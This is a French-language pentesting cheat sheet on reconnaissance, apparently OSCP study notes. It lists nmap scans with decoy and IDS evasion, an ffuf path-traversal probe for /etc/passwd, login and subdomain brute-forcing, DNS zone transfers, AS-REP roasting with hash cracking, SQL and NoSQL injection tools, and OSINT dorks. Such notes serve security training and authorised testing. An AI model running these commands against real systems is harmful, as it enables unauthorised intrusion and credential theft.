La reconnaissance (recon) peut être définie comme une enquête ou une observation préliminaire de votre cible (client) sans l’alerter de vos activités. Si vos activités de reconnaissance sont trop bruyants, l’autre partie sera alertée, ce qui pourrait diminuer vos chances de succès.
“If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.” – Sun Tzu
Tips
Add the domain in /etc/hosts if needed
Network scan
Host discovery
😎 Quick Access
Passive host discovery scan (ARP sniff) :
nmap -sn <CIDR>
SMB host :
crackmapexec smb <IP-range>
Windows servers :
nmap -T3 -p53,88,389,445,636 <IP-range> --open
#windows NETBIOS to IP :
ping <hostname>
nslookup <hostname>
Netdiscover
Passive scan (ARP sniff) :
sudo netdiscover -i <interface> -r <IP> -p
Active scan :
sudo netdiscover -i <interface> -r <IP>
👺 Impact the network performances
Nmap
Passive host discovery scan (ARP sniff) :
nmap -sn <CIDR>
Fast scan (Top 1K ports) :
sudo nmap -sS -sU -sV -sC -oA ./quick.txt <IP>
Full scan (Run Again with all ports) :
sudo nmap -p- -sS -sU -sV -sC -oA ./full.txt <IP>
Aggressive fast scan :
nmap -A <IP>
Aggressive host scan (All Enabled – if needed) :
nmap -p0- -v -A -T4 -oA ./aggressive.txt <IP>
Vulnerabily Scan :
nmap -sV -sC --script=vuln -oA ./quick.txt <IP>
Scan from Spoofed IPs (Firewal/IDS evasion) :
nmap -D <IP-1>,...,<IP-n>
| Options | Description |
|---|---|
| -sC | Scan with default NSE scripts. Considered useful for discovery and safe |
| -sS | TCP SYN port scan (Default with root privilege) |
| -sT | TCP connect port scan (Default without root privilege) |
| -sU | UDP port scan |
| -sA | TCP ACK port scan |
| -sW | TCP Window port scan |
| -sV | Attempts to determine the version of the service running on port |
| -A | Agresive mode. Enables OS detection, version detection, script scanning, and traceroute |
| -O | OS Fingerprinting |
| -T0 | Paranoid (0) Intrusion Detection System evasion |
| -T1 | Sneaky (1) Intrusion Detection System evasion |
| -T2 | Polite (2) slows down the scan to use less bandwidth and use less target machine |
| -T3 | Normal (3) which is default speed |
| -T4 | Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable |
| -T5 | Insane (5) speeds scan; assumes you are on an extraordinarily fast network |
| -oA | Output in the three major formats at once |
| -D | (Decoy) Send scans from spoofed IPs |
| –script=safe | Won’t affect the target |
| –script=vuln | Scan for vulnerabilities |
| –script=exploit | Attempt to exploit a vulnerability |
| –script=auth | Attempt to bypass authentication for running services (e.g. Log into an FTP server anonymously) |
| –script=brute | Attempt to bruteforce credentials for running services |
| –script=discovery | Attempt to query running services for further information about the network (e.g. query an SNMP server) |
| -oG <file> | Grepable output format |
Nmap Automator
nmapAutomator.sh -H <IP> -t recon
Automatisation du scan :
- Network : Shows all live hosts in the host’s network (~15 seconds)
- Port : Shows all open ports (~15 seconds)
- Script : Runs a script scan on found ports (~5 minutes)
- Full : Runs a full range port scan, then runs a thorough scan on new ports (~5-10 minutes)
- UDP : Runs a UDP scan “requires sudo” (~5 minutes)
- Vulns : Runs CVE scan and nmap Vulns scan on all found ports (~5-15 minutes)
- Recon : Suggests recon commands, then prompts to automatically run them
- All : Runs all the scans (~20-30 minutes)
Windows
IPv4 host discovery : #windows IPv4NetworkScan.ps1 :
powershell -ep bypass
L:\oscp\IPv4NetworkScan.ps1 -StartIPv4Address <IP-start> -EndIPv4Address <IP-end>
Linux
Host discovery (ARP) :
arp-scan $ip/24
Web
Directory Listing
FFUF
ffuf -recursion -u http://lun.fr/FUZZ -w <wordlist>
ffuf -u http://lun.fr/page.php?FUZZ=../../../../../../../../etc/passwd -w <wordlist>
# /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-files.txt
# /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
# /usr/share/wordlists/dirb/common.txt
# /usr/share/wordlists/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt
# /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories.txt
# /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
# look for response 200 & 302
# FUZZ.pdf
# FUZZ.txt
# FUZZ.php
# FUZZ.aspx
#/usr/share/wordlists/Security-Wordlist/LFI-WordList-Linux (from github)
#/usr/share/wordlists/Security-Wordlist/LFI-WordList-Windows
Auth cracking :
ffuf -u http://lun.fr/login -X POST -d "username=admin&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -w <wordlist>
dirbuster
Domains \ Subdomains
Search engines
# google search
site:*.domain.com -site:www.domain.com
Bruteforce
ffuf -u http://lun.fr -H "Host: FUZZ.lun.fr" -w <wordlist>
#/usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
# look for response 200 & 302
DNS
whois <domain> # hébergement
host -a <domain>
host -l <domain> [dns-server]
############################################
dnsrecon -d <domain> -t axfr [dns-server] # (active)
dnsenum <domain>
dig @<dns-server> <domain>
nslookup <domain>
sublist3r -d <domain> # multi sources
Reverse IP Lookup
Active Directory
Enumerate AD Users
Bruteforce with Kerbrute
Valid usernames :
sudo ./kerbrute userenum --dc <DC IP> -d <domain> <username.txt>
AS-REP Roasting (AS-REP Roastable users)
Get a KRB_AS_REP :
impacket-GetNPUsers -dc-ip <DC-IP> -request -outputfile hashes.asreproast <domain>/<username>
Crack password :
sudo hashcat -m 18200 hashes.asreproast <wordlist> -r /usr/share/hashcat/rules/best64.rule --force
App Vulnerability
nikto -h <url>
wpscan --url <url> # wordpress
cmsmap.py <url> # wordPress, joomla, drupal et moodle
whatweb <url> # lister les technologies web utilisées
## Injection
// SQL
sqlmap -u "http://example.com/?id=1" -p id # GET Requests
sqlmap -u "http://example.com" --data "username=*&password=*" # POST Requests
// NOSQL
python3 nosql-login-bypass.py -t http://dev.stocker.htb/login -u username -p password #https://github.com/C4l1b4n/NoSQL-Attack-Suite
nmap -p <port> <IP> --script=<script-name>
#/usr/share/nmap/scripts
searchsploit <technologie>
Wordlists
SecLists
https://github.com/danielmiessler/SecLists
Rockyou
Frameworks Enumeration
sudo sniper -t <domain>
sudo sniper -t <domain> -m stealth -o -re
# passive + OSINT
sudo amass enum -d <domain> -src -ip
Social / OSINT
Hint
- Google Search / Google Image
- Pages de profil (linkedin, twitter, facebook, instagram)
- Offres d’emploi
- Les dépôts Git
- Les forums
Dorks
# filter by website
site:<domain>
# cache search (old version)
cache:<url> <mot-clé>
cache:https://example.com hello
# search within the html body
intext:"<mot-clé>"
intext:"password"
intext:"@<domain>"
# search within the html body (full word)
allintext:<mot-clé> <mot-clé>
allintext:username password
# file type filter
filetype:log
# programing language filter
ext:php or ext:xml or ext:python
# exclusion
-<expression>
See more : ExploitDB, Dorksearch
Tools
Maltego
Outil de reconnaissance fonctionnant sur un système de graphe et de transformations. Nom de domaine –> IP –> Reverse DNS –> Autres noms de domaines
Shodan
shodan myip
shodan host <host>
Recon-NG
recon-ng
> help
> workspaces create <WORKSPACE_NAME>
> db schema # database
> db insert domains # add domain to analyse
> marketplace search <module>
> marketplace info <module>
> marketplace install <module>
> marketplace remove <module>
> modules search <module>
> module load <module>
> options list
> options set SOURCE example.com
> run
recon-ng -w <WORKSPACE_NAME> # start a predefined workspace